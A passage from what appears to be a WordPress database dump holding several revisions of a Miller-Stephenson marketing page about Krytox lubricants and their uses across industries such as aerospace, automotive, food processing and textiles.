other components.\r\n\r\nKrytox technology can help provide the best available equipment performance and lowest available life cycle cost through:\r\n<ul>\r\n 	<li>Longer lasting lubrication: Reduction of the amount of lubricant needed by 10 times or greater, therefore, decreasing costs and frequency of re-lubrication. Krytox can extend lubrication intervals from weekly to annually—and much longer in some equipment, such as soot blower carriages.</li>\r\n 	<li>Reduced wear and tear: Krytox lubricants can decrease wear on bearings, gears, and stand up to the extreme temperatures of 107–399 °C (225–750 °F) and harsh chemicals that can significantly reduce maintenance efforts and the chance of component failure.</li>\r\n</ul>\r\n<a name="text"></a>\r\n[ux_product_categories ids="46,96" number="10"]\r\n\r\n<strong>Textile</strong>\r\n\r\nKrytox oils and greases provide superior performance and extended life to textile machinery. These performance lubricants are designed to surpass conventional lubricants. At high temperatures, Krytox lubricants retain integrity and continue to lubricate. Conventional lubricants carbonize and destroy the bearing or gear.\r\n\r\nKrytox performance lubricants can enhance the function of tenter frame cross screw boxes, steamer and dryer bearings, lifter reel bearings in dye machines, tenter frame chains and gear boxes, high-speed motors, and guiding rails and clips for fabric and film stretching. Krytox performance lubricants offer these benefits for textile finishing applications:\r\n<ul>\r\n 	<li>ISO-9002 certified</li>\r\n 	<li>No oxidation or degradation</li>\r\n 	<li>Protection from rust and high-temperature corrosion</li>\r\n 	<li>Superior lubricity</li>\r\n 	<li>Compatible with all metals, elastomers, and plastics</li>\r\n 	<li>Compatible with oxygen and chlorine</li>\r\n</ul>\r\n<a name="tire"></a>\r\n[ux_product_categories ids="35,99,100,101" number="10"]\r\n\r\n<strong>Tire Mold</strong>\r\n\r\nKrytox lubricant, TM-7, is ideal for electrical- and steam-heated tire molds, because it exceeds industry specifications for all components. Krytox TM-7 can extend product life and reduce the need for re-application.\r\n<ul>\r\n 	<li>High temperature performance</li>\r\n 	<li>Extended re-application interval</li>\r\n 	<li>Excellent adhesion</li>\r\n 	<li>High hydrolytic stability</li>\r\n 	<li>Elimination of carbon residue build-up on molds</li>\r\n</ul>\r\n[ux_product_categories ids="143" number="10"]', 'Krytox Lubrication Overview', '', 'inherit', 'closed', 'closed', '', '2058-revision-v1', '', '', '2016-09-29 18:29:20', '2016-09-29 18:29:20', '', 2058, 'https://www.miller-stephenson.com/2058-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (2189, 2, '2016-09-29 18:33:06', '2016-09-29 18:33:06', '&nbsp;\r\n<p style="text-align: center;"><span style="font-size: 140%;"><strong>Choose Your Industry</strong></span></p>\r\n[row col_style="dashed"]\r\n\r\n[col span="4" span__sm="12"]\r\n\r\n<a href="#aerospace">Aerospace, Aviation, and National Defense</a>\r\n\r\n[/col]\r\n[col span="4" span__sm="12"]\r\n\r\n<a href="#automotive">Automotive - Squeak &amp; Rattle</a>\r\n\r\n[/col]\r\n[col span="4" span__sm="12"]\r\n\r\n<a href="#automotive2">Automotive - Mechanical Systems</a>\r\n\r\n[/col]\r\n[col span="4" span__sm="12"]\r\n\r\n<a href="#board">Box Board Corrugating</a>\r\n\r\n[/col]\r\n[col span="4" span__sm="12"]\r\n\r\n<a href="#petro">Chemical and Petrochemical</a>\r\n\r\n[/col]\r\n[col span="4" span__sm="12"]\r\n\r\n<a href="#elec">Electronics / Semiconductor</a>\r\n\r\n[/col]\r\n[col span="4" span__sm="12"]\r\n\r\n<a href="#food">Food Processing</a>\r\n\r\n[/col]\r\n[col span="4" span__sm="12"]\r\n\r\n<a href="#med">Medical Industry</a>\r\n\r\n[/col]\r\n[col span="4" span__sm="12"]\r\n\r\n<a href="#metal">Metal Processing</a>\r\n\r\n[/col]\r\n[col span="4" span__sm="12"]\r\n\r\n<a href="#oxy">Oxygen &amp; Reactive Gas Service</a>\r\n\r\n[/col]\r\n[col span="4" span__sm="12"]\r\n\r\n<a href="#power">Power Generation</a>\r\n\r\n[/col]\r\n[col span="4" span__sm="12"]\r\n\r\n<a href="#pulp">Pulp &amp; Paper</a>\r\n\r\n[/col]\r\n[col span="4" span__sm="12"]\r\n\r\n<a href="#text">Textile</a>\r\n\r\n[/col]\r\n[col span="4" span__sm="12"]\r\n\r\n<a href="#tire">Tire Mold</a>\r\n\r\n[/col]\r\n<a name="aerospace"></a>\r\n[/row]\r\n\r\n<span style="font-size: 130%;"><strong>Krytox Lubricants Industries and Applications</strong></span>\r\n\r\n<span style="font-size: 110%;"><strong>Aerospace, Aviation, and National Defense</strong></span>\r\n<ul>\r\n 	<li><span style="font-size: 100%;">Sub-Orbital, Orbital, and Deep Space Flight—Reliability and long service life of mission-critical mechanical components in the face of high vacuum, temperature extremes, contact with fuels and oxidizers, and radiation exposure</span></li>\r\n 	<li><span style="font-size: 100%;">Commercial, Corporate, and Military Aviation— Reduced maintenance requirements, improved safety and reliability, compliance with a wide range of military specifications</span></li>\r\n</ul>\r\nBased on the fluoropolymer technology of Chemours, Krytox performance lubricants have demonstrated the broad applicability to replace hundreds of purpose formulated conventional oils and greases throughout the aerospace industry with properties such as:\r\n<ul>\r\n 	<li>Low outgassing</li>\r\n 	<li>Wide temperature range</li>\r\n 	<li>Robust resistance to change in properties over time, in the face of harsh environmental conditions such as shock, vibration, heat and pressure; aggressive chemical environments, including rocket fuels and oxidizers; and intense radiation exposure</li>\r\n 	<li>Resistance to vaporization losses in the vacuum of high-altitude flight, orbit, and deep space</li>\r\n 	<li>Excellent frictional properties for long wear and low energy consumption</li>\r\n 	<li>Compatibility with all metals, elastomers, plastics, paints, and finishes</li>\r\n</ul>\r\nGeneral Applications\r\n<ul>\r\n 	<li>Bearings—all types</li>\r\n 	<li>Seals—valves and pumps</li>\r\n 	<li>O-rings—sealants, lubricants</li>\r\n</ul>\r\nAerospace-Specific Applications\r\n<ul>\r\n 	<li>Oxygen systems—valve and pump packing seals, mechanical seals, and connectors</li>\r\n 	<li>Rocket engines, liquid fueled—turbines, gimbals, pumps, gears, valves with fuel/oxidizer exposure</li>\r\n 	<li>Actuators—mechanical/gear-type actuators for control valves and systems</li>\r\n 	<li>Mechanical components—spline shafts, control linkages</li>\r\n</ul>\r\n<a name="automotive"></a>\r\n[ux_product_categories ids="35,99,100,101" number="10"]\r\n\r\n<span style="font-size: 110%;"><strong>Automotive—Squeak and Rattle</strong></span>\r\n\r\nMiller-Stephenson has worked extensively with automakers and suppliers to reduce noise, vibration, and harshness (NVH) levels in many vehicles, ranging from luxury cars to light trucks. As a result, Krytox high-performance oils and greases are used by numerous automakers in many automotive applications to reduce squeaks, rattle, and “itch”—a squeak that can develop when rubber or plastic mates against glass or paint. Some of these commercial applications are metal-on-plastic squeak, leather on leather itch, window lace, convertible top seals, front and sliding door seals, steering column gaskets, and weather stripping. Krytox is an excellent lubricant, even in barely detectable quantities. It is easy to apply, either by spraying or brushing. Because it has low vapor pressure and surface energy, and is insoluble in all common solvents, Krytox lubricant stays where you put it. It has also been used in conveyors and other critical equipment in manufacturing facilities.\r\n<a name="automotive2"></a>\r\n[ux_product_categories ids="37,46,96,97,98" number="10"]\r\n\r\n<span style="font-size: 110%;"><strong>Automotive—Mechanical Systems</strong></span>\r\n\r\nDesign/OEM As operating conditions become increasingly hotter, components run faster, standard lubricants begin to fail prematurely, and warranty costs rise, Krytox lubricants can be counted on to handle the challenge. Krytox oils and greases are more than lubricants—they are design components. Krytox lubricants have a superior aesthetic quality and appeal. When a lubricant increases the quality of an automotive component, it becomes as much an essential design element as a gear or a motor. For over 50 years, Krytox lubricants have provided state of-the-art performance for mechanical systems. Krytox technology can provide optimum equipment performance and low life cycle cost through:\r\n<ul>\r\n 	<li>Prevention of wear and noise from vibration: Krytox lubricants and coatings can minimize the shock and stress in moving parts that create heat, wear, and noise. They stand up to high temperatures and harsh environments, and reduce the chances of component failure.</li>\r\n 	<li>Longer lasting lubrication: For many applications, the typical service life will exceed 10 years or 100,000 miles.</li>\r\n</ul>\r\nThe public demands automobiles that are efficient and reliable. Automakers are striving towards extended warranties, expecting cars and trucks that will not require service visits before 100,000 miles or re-lubrication of sealed bearings and U-joints before 150,000 miles. As consumer and automaker expectations rise, Krytox high performance synthetic lubricants can provide:\r\n<ul>\r\n 	<li>A wide temperature range</li>\r\n 	<li>Effectiveness: Krytox lubricants keep performing in the toughest conditions: rain, snow, ice, dust, and grit. • Resistance: Krytox lubricants can withstand the fuel, coolant, brake fluid, and washer solvent of the harsh under hood environment. They are resistant to evaporation or changes in characteristics over the many years of an automobile’s serviceable life.</li>\r\n 	<li>Compatibility: Krytox lubricants have no effect on paint and no compatibility issues with other automotive materials or surfaces they may contact. Formula One™3 and NASCAR teams use Krytox lubricants for suspension and steering components, drive train components, and engine auxiliary parts. Use Krytox lubricants to help extend the service life of a variety of car and truck parts:</li>\r\n 	<li>Under hood: fan clutch bearings, emission air pumps, spark plug boots, clutch release bearings, anti lock brake systems, windshield wiper motors, belt pulleys, oil pressure sensors, alternator bearings, and sintered bearings in motors</li>\r\n 	<li>Chassis: wheel bearings, CV/universal joints</li>\r\n</ul>\r\n• Interior: weather stripping, sunroof seals, window lift mechanism, leather seats, consoles and trim, flocked and unflocked window seals and channels, door handles, switches, air vents, controls, and airbag covers\r\n\r\nKrytox lubricants even help improve performance in the auto manufacturing environment, providing lubrication for paint oven conveyor trolleys.\r\n<a name="petro"></a>\r\n[ux_product_categories ids="37,46,96,97,98" number="10"]\r\n\r\n<span style="font-size: 110%;"><strong>Chemical and Petrochemical</strong></span>\r\n\r\nMiller-Stephenson has extensive technical expertise in the special needs of the chemical and petrochemical industries, having long-standing experience with systems in these industries that require lubricants to help provide safe operations. That’s why performance lubricants from Chemours offer non-reactive, nonflammable lubricants, including the Krytox NRT line of oils and greases. Krytox lubricant technology delivers:\r\n<ul>\r\n 	<li>Extended equipment life</li>\r\n 	<li>No auto-ignition at temperatures up to 482 °C (900 °F) in oxygen</li>\r\n 	<li>No ignition at pressures up to 350 bar</li>\r\n 	<li>Compatibility with polymers used in seals, O-rings, valves</li>\r\n 	<li>BAM certification</li>\r\n</ul>\r\nLubricants from Chemours have been independently tested by companies and organizations, such as BOC, Air Liquide, BAM, NASA, and General Dynamics, and have been confirmed for use with oxygen and other reactive chemical compatibility. Krytox lubricants work in a variety of applications and are approved for use in valves, fans, pumps, agitators, reactors, centrifuges, and other components.\r\n<a name="board"></a>\r\n[ux_product_categories ids="36,38,34" number="10"]\r\n\r\n<span style="font-size: 110%;"><strong>Box Board Corrugating</strong></span>\r\n\r\nKrytox performance lubricants have become the corrugator industry standard for lubricating bearings on heated rolls in single facers and associated equipment. Built upon that history of innovation is Krytox CorrSurface Protect coatings and our portfolio of H-1 food-grade approved products. Krytox performance lubricants provide multifaceted investment protection such as:\r\n<ul>\r\n 	<li>Proven success in the industry—Chemours developed the lubrication standard for the paperboard manufacturing industry. With world-class technical service and research, we have more than 25 years of proven success.</li>\r\n 	<li>Less downtime and more productivity—Helps eliminate breakdowns related to bearings and high costs to repair or replace damaged bearings, corrugator rolls, journals, or flutes.</li>\r\n 	<li>Reduced maintenance and cleanup—Performs from roll change to roll change, no matter how long the interval. Will not carbonize on roll bearings, housings, or machinery; so, disassembly and cleanup time are reduced. Extends intervals between re-lubrication.</li>\r\n 	<li>Reduced safety and environmental problems—Not only can Krytox help reduce slipping hazards and spillage on product, but it also reduces solid waste and contamination of wastewater; thereby, reducing the costs and potential impact on the environment.</li>\r\n</ul>\r\nKrytox performance lubricants have been developed to provide the best protection for bearings in high temperature service up to 399 °C (750 °F), resulting in the best value, while exhibiting these other benefits:\r\n<ul>\r\n 	<li>ISO-9002 certified</li>\r\n 	<li>Long-term wear resistance</li>\r\n 	<li>Decreased wear and bearing failure</li>\r\n 	<li>Protection from rust and high-temperature corrosion</li>\r\n 	<li>No carbonization</li>\r\n 	<li>Superior lubricity</li>\r\n 	<li>Compatible with all metals, elastomers, and plastics</li>\r\n 	<li>Water, steam, and chemical resistant in the most severe environments</li>\r\n</ul>\r\n<a name="elec"></a>\r\n[ux_product_categories ids="46,96" number="10"]\r\n\r\n<span style="font-size: 110%;"><strong>Electronics/Semiconductor</strong></span>\r\n\r\nKrytox lubricants offer excellent safety and protection benefits for the electronics industry. Our oils and greases are recognized by all major vacuum pump manufacturers and OEM equipment suppliers, meeting or exceeding all warranty requirements. Applications include:\r\n<ul>\r\n 	<li>Wet and dry vacuum pumps</li>\r\n 	<li>Vacuum system sealants</li>\r\n 	<li>Clean rooms</li>\r\n 	<li>Robotics</li>\r\n</ul>\r\nMultipurpose, high-temperature, and anti-corrosion greases; lubricating oils, and vacuum pump fluids are available for every piece of equipment in the production line, including:\r\n<ul>\r\n 	<li>Bearings</li>\r\n 	<li>Valves</li>\r\n 	<li>Seals</li>\r\n 	<li>O-rings</li>\r\n 	<li>Chains</li>\r\n 	<li>Compressors</li>\r\n 	<li>Gear boxes</li>\r\n 	<li>Mechanical pumps and other components</li>\r\n</ul>\r\n<a name="food"></a>\r\n\r\n[ux_product_categories ids="156,46,96" number="10"]\r\n\r\n<span style="font-size: 110%;"><strong>Food Processing</strong></span>\r\n\r\nKrytox lubricants for use in the food processing industry are:\r\n<ul>\r\n 	<li>Completely clear, odorless oils • White greases for low- and high-temperature applications, specifically oven applications</li>\r\n 	<li>Able to protect bearings and other components under all load and speed conditions</li>\r\n 	<li>Available in a full line of H-1 PFPE lubricants</li>\r\n</ul>\r\nKrytox oils and greases offer unmatched stability and flexibility:\r\n<ul>\r\n 	<li>Non-toxic and made of only carbon, oxygen, and fluorine. These oils and greases will not carbonize or burn, even in 100% liquid or gaseous oxygen</li>\r\n 	<li>Multipurpose, high-temperature, and anti-corrosion greases; lubricating oils and vacuum pump fluids for every piece of equipment in the production line, including bearings, valves, seals, O-rings, chains, compressors, gear boxes, mechanical pumps, and other components</li>\r\n 	<li>Undamaged by, and non-reactive with, acidic or caustic cleaners and disinfectants, steam, moisture, and high temperatures</li>\r\n</ul>\r\n<a name="med"></a>\r\n[ux_product_categories ids="96,46,38,97" number="10"]\r\n\r\n<span style="font-size: 110%;"><strong>Medical Industry Equipment Applications </strong></span>\r\n\r\nIn medical applications, Krytox lubricants offer safety and efficacy:\r\n<ul>\r\n 	<li>Oxygen-compatible and good coefficient of friction • Best lubrication technology available in the medical industry</li>\r\n 	<li>H-1 food grade oils and greases available Krytox works in a variety of applications:</li>\r\n 	<li>Oxygen systems and respirators</li>\r\n 	<li>Approved as polymer additives/USP Class VI (Fluoroguard™)</li>\r\n</ul>\r\n<a name="metal"></a>\r\n[ux_product_categories ids="35,99,100,101" number="10"]\r\n\r\n<span style="font-size: 110%;"><strong>Metal Processing </strong></span>\r\n\r\nWith high load tolerance and good water washout resistance, Krytox protects in the most extreme metals processing environments. Krytox oils and greases can cut production costs by increasing the life of equipment in rod mills, smelters, acid, steel, foundry, aluminum, copper, and gold.\r\n<a name="oxy"></a>\r\n[ux_product_categories ids="40,115,116,123" number="10"]\r\n\r\n<span style="font-size: 110%;"><strong>Oxygen and Reactive Gas Service </strong></span>\r\n\r\nWhen working with reactive gas equipment, failure is not an option.\r\n\r\nConventional lubricants that contain mineral oils or conventional synthetics can react with oxygen and halogens, such as chlorine, fluorine, and bromine; thus, increasing the potential for explosion, fire, and premature deterioration.\r\n\r\nReactive gas applications require lubricants that help provide safe operations. Performance lubricants from Miller-Stephenson offer the Krytox NRT line of oils and greases that deliver:\r\n<ul>\r\n 	<li>No auto-ignition at temperatures up to 482 °C (900 °F) in oxygen</li>\r\n 	<li>No ignition at pressures up to 350 bar</li>\r\n 	<li>Compatibility with polymers used in seals, O-rings, and valves</li>\r\n 	<li>Lubricants from Chemours have been independently tested by companies and organizations, such as BOC, Air Liquide, BAM, NASA, and General Dynamics, and they have been confirmed for use with oxygen and other reactive chemical compatibility</li>\r\n</ul>\r\nLubricants from Chemours help ensure safe operations in reactive gas service. Krytox technology provides stateof-the-art performance for mechanical systems under harsh conditions. From compressors and bearings—to seals, actuators, valves, and more—Krytox is the ideal choice for use in cryogenic and fire fighting applications, life support systems and equipment, and components in reactive gas service.\r\n\r\n<a name="power"></a>\r\n[ux_product_categories ids="36,38,115,116" number="10"]\r\n\r\n<span style="font-size: 110%;"><strong>Power Generation</strong></span>\r\n\r\nKrytox lubricants provide optimum performance for mechanical systems, such as turbine auxiliary systems, gearboxes, dampers, valves, gaskets, high voltage and circuit breakers, seals, and other components.\r\n\r\nKrytox lubricant technology can provide the best available equipment performance and lowest available life cycle cost through:\r\n<ul>\r\n 	<li>Longer lasting lubrication: reduction of the amount of lubricant needed by 10 times or greater, therefore decreasing costs and frequency of re-lubrication. Krytox can extend lubrication intervals from weekly to annually or even longer in some equipment.</li>\r\n 	<li>Reduced wear and tear on component parts, reducing the chances of component failure.</li>\r\n 	<li>Improving steam turbine performance of the cam shaft bearing and fulcrum pins, despite constant exposure to extremely high temperatures. Krytox XHT-BDZ improves the reliability for steam turbine governor control valves.</li>\r\n</ul>\r\n<a name="pulp"></a>\r\n\r\n[ux_product_categories ids="40,171,96,97" number="10"]\r\n\r\n<span style="font-size: 110%;"><strong>Pulp and Paper</strong></span>\r\n\r\nChoose the lubricant that can move pulp and paper productivity to new levels.\r\n\r\nIn the extreme conditions of pulp mill and paper machine equipment, the selection of lubricants can affect production equipment up time and life cycle costs. Krytox lubricants provide endurance through heat, stay in place in the presence of steam or water, and do not react with the chemicals used in production processes. Consider these critical factors:\r\n<ul>\r\n 	<li>Frequency of lubrication: With some lubricants, pulp and paper mill equipment requires frequent re-lubrication, which can impact production and be costly over time.</li>\r\n 	<li>Extreme production environments: High temperatures and harsh chemicals can cause lubricant breakdown, compromising performance and leading to additional maintenance effort.</li>\r\n 	<li>Safety and environmental concerns: Some lubricants contain volatile organic chemical or chlorinated materials, which can be hazardous to the environment and plant employees. Frequent re-lubrication increases employee exposure to dangerous, high-temperature areas.</li>\r\n</ul>\r\nAs in power generation and other industries, Krytox lubricants provide optimum performance for mechanical systems, such as turbine auxiliary systems, gearboxes, dampers, valves, gaskets, seals, and other components.\r\n\r\nKrytox technology can help provide the best available equipment performance and lowest available life cycle cost through:\r\n<ul>\r\n 	<li>Longer lasting lubrication: Reduction of the amount of lubricant needed by 10 times or greater, therefore, decreasing costs and frequency of re-lubrication. Krytox can extend lubrication intervals from weekly to annually—and much longer in some equipment, such as soot blower carriages.</li>\r\n 	<li>Reduced wear and tear: Krytox lubricants can decrease wear on bearings, gears, and stand up to the extreme temperatures of 107–399 °C (225–750 °F) and harsh chemicals that can significantly reduce maintenance efforts and the chance of component failure.</li>\r\n</ul>\r\n<a name="text"></a>\r\n[ux_product_categories ids="46,96" number="10"]\r\n\r\n<span style="font-size: 110%;"><strong>Textile</strong></span>\r\n\r\nKrytox oils and greases provide superior performance and extended life to textile machinery. These performance lubricants are designed to surpass conventional lubricants. At high temperatures, Krytox lubricants retain integrity and continue to lubricate. Conventional lubricants carbonize and destroy the bearing or gear.\r\n\r\nKrytox performance lubricants can enhance the function of tenter frame cross screw boxes, steamer and dryer bearings, lifter reel bearings in dye machines, tenter frame chains and gear boxes, high-speed motors, and guiding rails and clips for fabric and film stretching. Krytox performance lubricants offer these benefits for textile finishing applications:\r\n<ul>\r\n 	<li>ISO-9002 certified</li>\r\n 	<li>No oxidation or degradation</li>\r\n 	<li>Protection from rust and high-temperature corrosion</li>\r\n 	<li>Superior lubricity</li>\r\n 	<li>Compatible with all metals, elastomers, and plastics</li>\r\n 	<li>Compatible with oxygen and chlorine</li>\r\n</ul>\r\n<a name="tire"></a>\r\n[ux_product_categories ids="35,99,100,101" number="10"]\r\n\r\n<span style="font-size: 110%;"><strong>Tire Mold</strong></span>\r\n\r\nKrytox lubricant, TM-7, is ideal for electrical- and steam-heated tire molds, because it exceeds industry specifications for all components. Krytox TM-7 can extend product life and reduce the need for re-application.\r\n<ul>\r\n 	<li>High temperature performance</li>\r\n 	<li>Extended re-application interval</li>\r\n 	<li>Excellent adhesion</li>\r\n 	<li>High hydrolytic stability</li>\r\n 	<li>Elimination of carbon residue build-up on molds</li>\r\n</ul>\r\n[ux_product_categories ids="143" number="10"]', 'Krytox Lubrication Overview', '', 'inherit', 'closed', 'closed', '', '2058-revision-v1', '', '', '2016-09-29 18:33:06', '2016-09-29 18:33:06', '', 2058, 'https://www.miller-stephenson.com/2058-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (2190, 2, '2016-09-29 19:14:23', '2016-09-29 19:14:23', '&nbsp;\r\n<p style="text-align: center;"><span style="font-size: 140%;"><strong>Choose Your Industry</strong></span></p>\r\n[row col_style="dashed"]\r\n\r\n[col span="4" span__sm="12"]\r\n\r\n<a href="#aerospace">Aerospace, Aviation, and National Defense</a>\r\n\r\n[/col]\r\n[col span="4" span__sm="12"]\r\n\r\n<a href="#automotive">Automotive - Squeak &amp; Rattle</a>\r\n\r\n[/col]\r\n[col span="4" span__sm="12"]\r\n\r\n<a href="#automotive2">Automotive - Mechanical Systems</a>\r\n\r\n[/col]\r\n[col span="4" span__sm="12"]\r\n\r\n<a href="#board">Box Board Corrugating</a>\r\n\r\n[/col]\r\n[col span="4" span__sm="12"]\r\n\r\n<a href="#petro">Chemical and Petrochemical</a>\r\n\r\n[/col]\r\n[col span="4" span__sm="12"]\r\n\r\n<a href="#elec">Electronics / Semiconductor</a>\r\n\r\n[/col]\r\n[col span="4" span__sm="12"]\r\n\r\n<a href="#food">Food Processing</a>\r\n\r\n[/col]\r\n[col span="4" span__sm="12"]\r\n\r\n<a href="#med">Medical Industry</a>\r\n\r\n[/col]\r\n[col span="4" span__sm="12"]\r\n\r\n<a href="#metal">Metal Processing</a>\r\n\r\n[/col]\r\n[col span="4" span__sm="12"]\r\n\r\n<a href="#oxy">Oxygen &amp; Reactive Gas Service</a>\r\n\r\n[/col]\r\n[col span="4" span__sm="12"]\r\n\r\n<a href="#power">Power Generation</a>\r\n\r\n[/col]\r\n[col span="4" span__sm="12"]\r\n\r\n<a href="#pulp">Pulp &amp; Paper</a>\r\n\r\n[/col]\r\n[col span="4" span__sm="12"]\r\n\r\n<a href="#text">Textile</a>\r\n\r\n[/col]\r\n[col span="4" span__sm="12"]\r\n\r\n<a href="#tire">Tire Mold</a>\r\n\r\n[/col]\r\n<a name="aerospace"></a>\r\n[/row]\r\n\r\n<span style="font-size: 130%;"><strong>Krytox Lubricants Industries and Applications</strong></span>\r\n\r\n<span style="font-size: 110%;"><strong>Aerospace, Aviation, and National Defense</strong></span>\r\n<ul>\r\n 	<li><span style="font-size: 100%;">Sub-Orbital, Orbital, and Deep Space Flight—Reliability and long service life of mission-critical mechanical components in the face of high vacuum, temperature extremes, contact with fuels and oxidizers, and radiation exposure</span></li>\r\n 	<li><span style="font-size: 100%;">Commercial, Corporate, and Military Aviation— Reduced maintenance requirements, improved safety and reliability, compliance with a wide range of military specifications</span></li>\r\n</ul>\r\nBased on the fluoropolymer technology of Chemours, Krytox performance lubricants have demonstrated the broad applicability to replace hundreds of purpose formulated conventional oils and greases throughout the aerospace industry with properties such as:\r\n<ul>\r\n 	<li>Low outgassing</li>\r\n 	<li>Wide temperature range</li>\r\n 	<li>Robust resistance to change in properties over time, in the face of harsh environmental conditions such as shock, vibration, heat and pressure; aggressive chemical environments, including rocket fuels and oxidizers; and intense radiation exposure</li>\r\n 	<li>Resistance to vaporization losses in the vacuum of high-altitude flight, orbit, and deep space</li>\r\n 	<li>Excellent frictional properties for long wear and low energy consumption</li>\r\n 	<li>Compatibility with all metals, elastomers, plastics, paints, and finishes</li>\r\n</ul>\r\nGeneral Applications\r\n<ul>\r\n 	<li>Bearings—all types</li>\r\n 	<li>Seals—valves and pumps</li>\r\n 	<li>O-rings—sealants, lubricants</li>\r\n</ul>\r\nAerospace-Specific Applications\r\n<ul>\r\n 	<li>Oxygen systems—valve and pump packing seals, mechanical seals, and connectors</li>\r\n 	<li>Rocket engines, liquid fueled—turbines, gimbals, pumps, gears, valves with fuel/oxidizer exposure</li>\r\n 	<li>Actuators—mechanical/gear-type actuators for control valves and systems</li>\r\n 	<li>Mechanical components—spline shafts, control linkages</li>\r\n</ul>\r\n<a name="automotive"></a>\r\n[ux_product_categories ids="35,99,100,101" number="10"]\r\n\r\n<span style="font-size: 110%;"><strong>Automotive—Squeak and Rattle</strong></span>\r\n\r\nMiller-Stephenson has worked extensively with automakers and suppliers to reduce noise, vibration, and harshness (NVH) levels in many vehicles, ranging from luxury cars to light trucks. As a result, Krytox high-performance oils and greases are used by numerous automakers in many automotive applications to reduce squeaks, rattle, and “itch”—a squeak that can develop when rubber or plastic mates against glass or paint. Some of these commercial applications are metal-on-plastic squeak, leather on leather itch, window lace, convertible top seals, front and sliding door seals, steering column gaskets, and weather stripping. Krytox is an excellent lubricant, even in barely detectable quantities. It is easy to apply, either by spraying or brushing. Because it has low vapor pressure and surface energy, and is insoluble in all common solvents, Krytox lubricant stays where you put it. It has also been used in conveyors and other critical equipment in manufacturing facilities.\r\n<a name="automotive2"></a>\r\n[ux_product_categories ids="37,46,96,97,98" number="10"]\r\n\r\n<span style="font-size: 110%;"><strong>Automotive—Mechanical Systems</strong></span>\r\n\r\nDesign/OEM As operating conditions become increasingly hotter, components run faster, standard lubricants begin to fail prematurely, and warranty costs rise, Krytox lubricants can be counted on to handle the challenge. Krytox oils and greases are more than lubricants—they are design components. Krytox lubricants have a superior aesthetic quality and appeal. When a lubricant increases the quality of an automotive component, it becomes as much an essential design element as a gear or a motor. For over 50 years, Krytox lubricants have provided state of-the-art performance for mechanical systems. Krytox technology can provide optimum equipment performance and low life cycle cost through:\r\n<ul>\r\n 	<li>Prevention of wear and noise from vibration: Krytox lubricants and coatings can minimize the shock and stress in moving parts that create heat, wear, and noise. They stand up to high temperatures and harsh environments, and reduce the chances of component failure.</li>\r\n 	<li>Longer lasting lubrication: For many applications, the typical service life will exceed 10 years or 100,000 miles.</li>\r\n</ul>\r\nThe public demands automobiles that are efficient and reliable. Automakers are striving towards extended warranties, expecting cars and trucks that will not require service visits before 100,000 miles or re-lubrication of sealed bearings and U-joints before 150,000 miles. As consumer and automaker expectations rise, Krytox high performance synthetic lubricants can provide:\r\n<ul>\r\n 	<li>A wide temperature range</li>\r\n 	<li>Effectiveness: Krytox lubricants keep performing in the toughest conditions: rain, snow, ice, dust, and grit. • Resistance: Krytox lubricants can withstand the fuel, coolant, brake fluid, and washer solvent of the harsh under hood environment. They are resistant to evaporation or changes in characteristics over the many years of an automobile’s serviceable life.</li>\r\n 	<li>Compatibility: Krytox lubricants have no effect on paint and no compatibility issues with other automotive materials or surfaces they may contact. Formula One™3 and NASCAR teams use Krytox lubricants for suspension and steering components, drive train components, and engine auxiliary parts. Use Krytox lubricants to help extend the service life of a variety of car and truck parts:</li>\r\n 	<li>Under hood: fan clutch bearings, emission air pumps, spark plug boots, clutch release bearings, anti lock brake systems, windshield wiper motors, belt pulleys, oil pressure sensors, alternator bearings, and sintered bearings in motors</li>\r\n 	<li>Chassis: wheel bearings, CV/universal joints</li>\r\n</ul>\r\n• Interior: weather stripping, sunroof seals, window lift mechanism, leather seats, consoles and trim, flocked and unflocked window seals and channels, door handles, switches, air vents, controls, and airbag covers\r\n\r\nKrytox lubricants even help improve performance in the auto manufacturing environment, providing lubrication for paint oven conveyor trolleys.\r\n<a name="petro"></a>\r\n[ux_product_categories ids="37,46,96,97,98" number="10"]\r\n\r\n<span style="font-size: 110%;"><strong>Chemical and Petrochemical</strong></span>\r\n\r\nMiller-Stephenson has extensive technical expertise in the special needs of the chemical and petrochemical industries, having long-standing experience with systems in these industries that require lubricants to help provide safe operations. That’s why performance lubricants from Chemours offer non-reactive, nonflammable lubricants, including the Krytox NRT line of oils and greases. Krytox lubricant technology delivers:\r\n<ul>\r\n 	<li>Extended equipment life</li>\r\n 	<li>No auto-ignition at temperatures up to 482 °C (900 °F) in oxygen</li>\r\n 	<li>No ignition at pressures up to 350 bar</li>\r\n 	<li>Compatibility with polymers used in seals, O-rings, valves</li>\r\n 	<li>BAM certification</li>\r\n</ul>\r\nLubricants from Chemours have been independently tested by companies and organizations, such as BOC, Air Liquide, BAM, NASA, and General Dynamics, and have been confirmed for use with oxygen and other reactive chemical compatibility. Krytox lubricants work in a variety of applications and are approved for use in valves, fans, pumps, agitators, reactors, centrifuges, and other components.\r\n<a name="board"></a>\r\n[ux_product_categories ids="36,38,34" number="10"]\r\n\r\n<span style="font-size: 110%;"><strong>Box Board Corrugating</strong></span>\r\n\r\nKrytox performance lubricants have become the corrugator industry standard for lubricating bearings on heated rolls in single facers and associated equipment. Built upon that history of innovation is Krytox CorrSurface Protect coatings and our portfolio of H-1 food-grade approved products. Krytox performance lubricants provide multifaceted investment protection such as:\r\n<ul>\r\n 	<li>Proven success in the industry—Chemours developed the lubrication standard for the paperboard manufacturing industry. With world-class technical service and research, we have more than 25 years of proven success.</li>\r\n 	<li>Less downtime and more productivity—Helps eliminate breakdowns related to bearings and high costs to repair or replace damaged bearings, corrugator rolls, journals, or flutes.</li>\r\n 	<li>Reduced maintenance and cleanup—Performs from roll change to roll change, no matter how long the interval. Will not carbonize on roll bearings, housings, or machinery; so, disassembly and cleanup time are reduced. Extends intervals between re-lubrication.</li>\r\n 	<li>Reduced safety and environmental problems—Not only can Krytox help reduce slipping hazards and spillage on product, but it also reduces solid waste and contamination of wastewater; thereby, reducing the costs and potential impact on the environment.</li>\r\n</ul>\r\nKrytox performance lubricants have been developed to provide the best protection for bearings in high temperature service up to 399 °C (750 °F), resulting in the best value, while exhibiting these other benefits:\r\n<ul>\r\n 	<li>ISO-9002 certified</li>\r\n 	<li>Long-term wear resistance</li>\r\n 	<li>Decreased wear and bearing failure</li>\r\n 	<li>Protection from rust and high-temperature corrosion</li>\r\n 	<li>No carbonization</li>\r\n 	<li>Superior lubricity</li>\r\n 	<li>Compatible with all metals, elastomers, and plastics</li>\r\n 	